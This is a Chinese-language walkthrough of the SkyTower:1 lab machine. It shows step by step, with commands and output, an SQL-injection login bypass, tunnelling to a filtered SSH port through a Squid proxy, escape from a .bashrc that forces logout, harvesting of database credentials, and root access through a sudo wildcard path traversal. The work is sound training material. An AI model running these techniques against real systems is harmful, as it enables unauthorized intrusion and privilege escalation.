SKYTOWER: 1
- 靶机环境介绍
- nmap扫描
- 端口扫描
- 服务扫描
- 漏洞扫描
- 总结
- 80端口
- 目录爆破
- 3128端口
- 获取立足点
- 获取立足点2
- 提权
- 总结
靶机环境介绍
https://www.vulnhub.com/entry/skytower-1,96/
靶机IP:192.168.56.101
kali IP:192.168.56.102
nmap扫描
端口扫描
sudo nmap --min-rate=5000 -p- 192.168.56.101
[sudo] kali 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:36 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds
服务扫描
sudo nmap -sVC -O -p22,80,3128 -oN nmap/details 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:37 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.59 seconds
漏洞扫描
sudo nmap --script=vuln -p22,80,3128 -oN nmap/vulns 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:39 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00049s latency).
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
| http-enum:
|_ /login.php: Possible admin folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
| Possible sqli for forms:
| Form at path: /, form's action: login.php. Fields that might be vulnerable:
|_ email
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.101:80/
| Form id:
|_ Form action: login.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds
总结
发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。
80端口
日常,先目录爆破
目录爆破
$ sudo gobuster dir --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,rar,txt,html,jsp,zip -u http://192.168.56.101 | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.101
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,rar,html,jsp,zip
[+] Timeout: 10s
===============================================================
2023/06/24 06:40:38 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 1136]
/.php (Status: 403) [Size: 286]
/index.html (Status: 200) [Size: 1136]
/.html (Status: 403) [Size: 287]
/login.php (Status: 200) [Size: 21]
/background (Status: 200) [Size: 2572609]
/.php (Status: 403) [Size: 286]
/.html (Status: 403) [Size: 287]
/background2 (Status: 200) [Size: 2831446]
/server-status (Status: 403) [Size: 295]
在目录爆破的过程中查看网页内容。
发现登录框,尝试万能密码。(这里用户和密码一样)
报错了,错误信息为
从这个信息可以看出,应该是过滤了=,or,这里修改一下。尝试绕过,先用 双写or绕过or。
登录成功了,
这里获取到一个凭据john:hereisjohn,提示去ssh登录,但是过滤了22端口呀,登录不上呀。没有思路了。下一个端口
3128端口
通过google搜索,发现该端口运行的是http-proxy Squid http proxy 3.1.20,是个代理服务,那有没有可能通过这个代理服务,访问到ssh的22端口呢。
通过搜索,发现可以使用proxytunnel或proxychain,我这里使用的是proxytunnel。
─$ proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666
这句话的意思是,使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为192.168.56.101:22端口,映射到本地kali的6666端口。
那我这里使用kali去连接。
$ ssh john@127.0.0.1 -p 6666
john@127.0.0.1's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014
Funds have been withdrawn
Connection to 127.0.0.1 closed.
这里可以看到连接成功后,退出了。那可能是进行了关闭。但是ssh可以在连接的时候使用 -t 执行命令。
尝试一下。
获取立足点
$ ssh john@127.0.0.1 -p 6666 -t '/bin/bash'
john@127.0.0.1's password:
输入密码后,发现没有任何提示,也没有退出。这里尝试输入指令。
$ ssh john@127.0.0.1 -p 6666 -t '/bin/bash'
john@127.0.0.1's password:
whoami
john
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
inet6 fe80::a00:27ff:fe54:4a37/64 scope link
valid_lft forever preferred_lft forever
id
uid=1000(john) gid=1000(john) groups=1000(john)
发现已经成功获取shell了。但是不太好用,也没有发现python程序。检查一下,为什么使用/bin//bash登录时,为什么会自动退出。
id
uid=1000(john) gid=1000(john) groups=1000(john)
ls -liah
total 24K
25132 drwx------ 2 john john 4.0K Jun 24 10:18 .
7647 drwxr-xr-x 5 root root 4.0K Jun 20 2014 ..
96 -rw------- 1 john john 7 Jun 20 2014 .bash_history
79 -rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
80 -rw-r--r-- 1 john john 3.4K Jun 20 2014 .bashrc
82 -rw-r--r-- 1 john john 675 Jun 20 2014 .profile
cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
#alias grep='grep --color=auto'
#alias fgrep='fgrep --color=auto'
#alias egrep='egrep --color=auto'
fi
# some more ls aliases
#alias ll='ls -l'
#alias la='ls -A'
#alias l='ls -CF'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
echo
echo "Funds have been withdrawn"
exit
vim .bashrc
/bin/bash: line 20: vim: command not found
通过查看.bashrc发现,他输出一句话之后,退出了bash环境,那就先尝试使用sh环境,
ssh john@127.0.0.1 -p 6666 -t '/bin/sh'
这里使用vi(因为没有vim),删除最后一行的exit。然后保存。
然后输入/bin/bash,获得好用的bash环境。
john@SkyTower:~$ whoami
john
john@SkyTower:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
inet6 fe80::a00:27ff:fe54:4a37/64 scope link
valid_lft forever preferred_lft forever
john@SkyTower:~$ uname -a
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
john@SkyTower:~$
john@SkyTower:~$
通过web页面知道,调用了sqll语句数据,那我们回到web目录查看有没有数据库信息。
发现了root:root信息,使用mysql登录一下。发现登录成功!
john@SkyTower:/var/www$ mysql -uroot -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.5.35-0+wheezy1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| SkyTech |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)
发现了三个用户信息。分别是sara:ihatethisjob william:senseable。
通过尝试,发现,sara可以登录,而william无法登录显示密码错误。
(在这之前我尝试使用su sara登录发现,进入bash环境后,秒退,这里可以想到还是.bashrc的问题。那这里继续使用ssh登录。
获取立足点2
┌──(kali㉿kali)-[~/oscp/12.KsyTower1]
└─$ rlwrap ssh sara@127.0.0.1 -p 6666 -t '/bin/sh'
sara@127.0.0.1's password: ************
sara@127.0.0.1's password:
$ /bin/bash
rlwrap: warning: rlwrap appears to do nothing for ssh, which asks for
single keypresses all the time. Don't you need --always-readline
and possibly --no-children? (cf. the rlwrap manpage)
warnings can be silenced by the --no-warnings (-n) option
sara@SkyTower:~$ whoami
sara
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$
提权
这里发现可以root无密码执行/bin/cat /accounts/\*,一开始我以为只能访问/accounts/目录下的文件,但是通过思考,可以发现,这里的* 指的是通配符,也就是可以目录穿越访问。试一试。
sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root
/bin/cat: /accounts/../../../root: Is a directory
sara@SkyTower:~$ sudo /bin/ls /accounts/../../../root
flag.txt
这里发现了/root/flag.txt文件,查看一下。
sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su
Password:
sara@SkyTower:~$ su
Password:
root@SkyTower:/home/sara# whoami
root
root@SkyTower:/home/sara# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
inet6 fe80::a00:27ff:fe54:4a37/64 scope link
valid_lft forever preferred_lft forever
root@SkyTower:/home/sara# cd ~
root@SkyTower:~# ls
flag.txt
root@SkyTower:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
inet6 fe80::a00:27ff:fe54:4a37/64 scope link
valid_lft forever preferred_lft forever
总结
1、SQL注入时需要通过提示信息修改注入代码,完成绕过。
2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。
3、使用proxytunnel代理软件,完成代理服务。
proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666
使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。
4、ssh john@127.0.0.1 -p 6666 -t '/bin/bash' ssh -t 可以使用-t 执行命令。
ssh username@remote_host -t command command_arguments
5、当发现/bash终端有问题时,可能是.bashrc文件出问题,可以尝试使用sh环境,查看.bashrc等其他文件。
6、当获取到反弹shell后,且web端存在sql数据操作,记得进入web目录查看配置文件,获取数据库信息。
7、获取到其他用户信息后可以尝试切换用户,使用sudo -l查看用户权限。
8、发现/bin/cat /accounts/* 这里可以使用目录穿越,这里的*表示通配符,可以使用/bin/cat /accounts/../../../path/to/file访问其他目录。
